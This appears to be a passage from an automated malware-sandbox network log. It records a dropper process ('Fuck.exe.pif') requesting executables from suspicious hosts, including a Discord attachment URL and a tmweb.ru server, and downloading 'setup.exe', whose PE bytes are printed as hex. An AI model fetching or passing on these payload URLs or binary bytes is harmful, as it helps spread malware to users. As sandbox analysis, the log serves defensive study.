                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16053INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16053INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    6192.168.11.2049847188.72.236.239443C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:22 UTC16053OUTGET /search_hyperfs_213.exe HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                    Host: 2jhbdhjfsdf2.monster
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    2022-10-04 05:10:22 UTC16054INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:22 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 555
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2022-10-04 05:10:22 UTC16054INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    7192.168.11.2049854162.159.133.233443C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:27 UTC16054OUTGET /attachments/982710296206536716/1020079721150685314/NotGraduate.exe HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                    Host: cdn.discordapp.com
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    2022-10-04 05:10:27 UTC16055INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:27 GMT
                                                                                                                                                                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 223
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    CF-Ray: 754b69446a019b74-FRA
                                                                                                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                                                                                                    Content-Disposition: attachment
                                                                                                                                                                                                                                    Expires: Tue, 04 Oct 2022 05:10:27 GMT
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                    X-GUploader-UploadID: ADPycdsQXrOckubcZ6GbldVwwoYNFV5hhNjZc9jk45oCQYVy5o0j8vbq6apkcMJQXezPlsMPxmT4wa9cnIYaUG3DW33JXQ
                                                                                                                                                                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ze%2FJK%2BbhQ7PXwdBQuahU675YHn0dhb2FbRwk5hM9%2BgOzScCtOac9oTD7%2FFAjZtQE4fwtRBhxIw1tcd3nIRWbjq1swYrh%2BFgTFm1e%2FQ9pbiWSBsCX7z39%2BpbbL14q7QuCUueg8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    2022-10-04 05:10:27 UTC16056INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 41 6e 6f 6e 79 6d 6f 75 73 20 63 61 6c 6c 65 72 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 47 6f 6f 67 6c 65 20 43 6c 6f 75 64 20 53 74 6f 72 61 67 65 20 6f 62 6a 65 63 74 2e 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                                                                                                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    8192.168.11.204985692.53.96.116443C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:27 UTC16056OUTGET /setup.exe HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                    Host: cf43570.tmweb.ru
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16056INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.20.2
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:27 GMT
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Content-Length: 520704
                                                                                                                                                                                                                                    Last-Modified: Tue, 27 Sep 2022 18:52:29 GMT
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    ETag: "6333466d-7f200"
                                                                                                                                                                                                                                    Expires: Fri, 04 Nov 2022 05:10:27 GMT
                                                                                                                                                                                                                                    Cache-Control: max-age=2678400
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16056INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c 65 f9 5a 28 04 97 09 28 04 97 09 28 04 97 09 4d 62 92 08 29 04 97 09 4d 62 94 08 2a 04 97 09 4d 62 93 08 3a 04 97 09 4d 62 96 08 39 04 97 09 28 04 96 09 88 04 97 09 4d 62 9f 08 21 04 97 09 4d 62 68 09 29 04 97 09 4d 62 95 08 29 04 97 09 52 69 63 68 28 04 97 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 8d b5 87 14 00 00 00
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$leZ(((Mb)Mb*Mb:Mb9(Mb!Mbh)Mb)Rich(PEd
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16072INData Raw: 0f 10 0d 46 4e 00 00 88 44 24 64 b8 01 00 00 00 84 05 47 82 00 00 0f 11 44 24 30 0f 10 05 3b 4e 00 00 0f 11 4c 24 40 0f 11 44 24 50 0f 85 aa 01 00 00 48 8b 0d 7c 93 00 00 4c 8d 44 24 70 41 b9 00 02 00 00 c6 44 24 70 00 ff 15 16 4a 00 00 80 7c 24 70 00 75 3c e8 c2 2b 00 00 85 c0 74 0f e8 f5 2a 00 00 41 b9 10 00 19 00 85 c0 75 06 41 b9 10 00 01 00 4c 8d 05 42 8a 00 00 49 8b cc 48 8d 54 24 30 ff 15 84 49 00 00 48 83 c8 ff e9 4a 01 00 00 48 83 cb ff 48 8b c3 4d 85 f6 74 67 48 ff c0 41 80 3c 06 00 75 f6 48 8b cb 48 ff c1 80 3c 0e 00 75 f7 48 03 c1 48 8d 54 24 70 48 8b cb 48 ff c1 80 3c 0a 00 75 f7 48 83 c0 64 48 03 c1 b9 40 00 00 00 8b d0 44 8b f8 ff 15 1e 48 00 00 48 8b f8 48 85 c0 0f 84 ef 00 00 00 4c 8b ce 4c 89 74 24 20 4c 8d 44 24 70 41 8b d7 48 8b c8 e8
                                                                                                                                                                                                                                    Data Ascii: FND$dGD$0;NL$@D$PH|LD$pAD$pJ|$pu<+t*AuALBIHT$0IHJHHMtgHA<uHH<uHHT$pHH<uHdH@DHHHLLt$ LD$pAH
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16088INData Raw: 00 40 59 00 00 b0 70 00 00 10 71 00 00 e0 75 00 00 80 78 00 00 60 79 00 00 b0 79 00 00 80 7c 00 00 00 7f 00 00 40 7f 00 00 20 80 00 00 10 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 64 76 61 70 69 33 32 2e 64 6c 6c 00 00 00 00 43 68 65 63 6b 54 6f 6b 65 6e 4d 65 6d 62 65 72 73 68 69 70 00 00 00 00 22 00 00 00 20 00 00 00 2e 49 4e 46 00 00 00 00 5b 00 00 00 5d 00 00 00 52 65 62 6f 6f 74 00 00 41 64 76 61 6e 63 65 64 49 4e 46 00 00 00 00 00 56 65 72 73 69 6f 6e 00 73 65 74 75 70 78 2e 64 6c 6c 00 00 00 00 00 00 73 65 74 75 70 61 70 69 2e 64 6c 6c 00 00 00 00 2e 42 41 54 00 00 00 00 53 65 53 68 75 74 64 6f 77 6e 50 72 69 76 69 6c 65 67 65 00 00 00 00 00 61 64 76 70 61 63 6b 2e 64 6c 6c 00 00 00 00 00 44 65 6c 4e 6f 64 65 52 75 6e 44 4c 4c 33 32 00 2a 00
                                                                                                                                                                                                                                    Data Ascii: @Ypqux`yy|@ advapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32*
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16104INData Raw: 00 04 0d 01 07 00 02 04 00 07 0f 01 07 01 00 00 00 00 02 24 00 00 03 03 00 0d 00 04 0d 01 07 00 02 04 00 07 0f 01 07 01 00 00 00 00 02 24 00 00 03 00 0d 0d 80 04 0d 01 07 00 02 04 00 07 0f 01 07 01 00 00 00 00 02 25 00 07 0d 01 07 00 02 04 00 07 0f 01 07 00 00 00 02 25 00 07 0d 01 07 00 02 04 00 07 0f 01 07 00 00 00 02 25 00 07 0d 00 03 07 0f 0f 80 06 0f 03 07 00 00 00 02 26 00 07 0d 00 08 07 0f 0f 0f 0f 07 07 07 00 00 00 02 26 00 07 0d 00 05 07 0f 07 07 07 00 00 00 00 02 26 00 02 0d 00 02 05 00 02 07 00 01 30 30 64 63 5c 01 00 00 00 02 2e 12 05 0d 00 00 00 02 2c 00 08 0d 00 00 00 02 2a 00 0b 0d 00 00 00 02 28 00 0e 0d 00 00 00 02 27 00 0f 0d 03 00 00 00 00 02 27 00 0d 0d 02 00 00 05 0f 07 08 00 00 ff 00 00 00 02 29 00 09 0d 02 00 03 0f 00 06 07 0f 08 08
                                                                                                                                                                                                                                    Data Ascii: $$%%%&&&00dc\.,*('')
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16120INData Raw: ae 7c 07 1b d7 26 7d 63 06 05 fd 2a c7 ac 71 ca 12 b6 be 34 96 ff 1f 7f 8b 49 c7 a4 f1 62 ce d8 43 1f 35 b0 8f 4d da 8e ee d4 1f 9e bd 45 50 ed e7 66 16 f5 b6 62 45 6d 76 5e b1 76 14 34 ea 16 b6 45 57 f0 73 b7 3f 18 a3 82 3b dd 82 f7 64 ca 7c ac b2 65 5f fa b8 63 25 dd b3 2e ab ff 1d 29 79 fb 7a 93 d5 cd 84 47 c8 fa 2c 8d 6b 8d 30 75 0d d9 38 d9 9a f6 af db d2 ee 61 3f 25 d9 aa 7a 32 d9 d2 3f 82 b2 f3 7f e0 a4 a8 6f 0b fa 03 33 d2 3d 19 59 02 fe c3 7a 45 c7 f6 94 b8 87 ab f4 49 d0 56 f4 52 3e 74 3d b1 f4 5a f5 49 3f 8b 27 27 bc 9e 84 98 d3 b0 4d fd 29 7f d6 f7 45 61 51 fa a4 77 8d f1 6f 6e e0 18 c5 ee e9 47 d1 a3 e8 a5 2d 6d 91 42 2e 2a 4e bd e5 8f 0c 4c 6a 9e d4 df 88 55 a4 72 4f e5 51 72 6e c9 d2 ea c8 f7 45 19 9d f6 f5 54 5c 0e 9d cb 0e b2 81 bd f0 c6
                                                                                                                                                                                                                                    Data Ascii: |&}c*q4IbC5MEPfbEmv^v4EWs?;d|e_c%.)yzG,k0u8a?%z2?o3=YzEIVR>t=ZI?''M)EaQwonG-mB.*NLjUrOQrnET\
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16136INData Raw: ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16152INData Raw: ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16168INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16184INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16200INData Raw: 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01
                                                                                                                                                                                                                                    Data Ascii: """""""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16216INData Raw: fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16232INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16248INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16264INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16280INData Raw: 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 04 85 21 18 54 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc ff fb bf 08 fc 00 00 00 00 00 00 00 00 3f 08 ff ff 10 fe 00 00 00 00 00 00 01 00 65 08 be 4f ef fb f9 be 00 d1 00 00 00 00 00 00 10 00 ef 83 4f f9 2d be ff 7f ff ff ff ff ff ff 00 c0 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22
                                                                                                                                                                                                                                    Data Ascii: """"!T?eOO-"""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16296INData Raw: ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
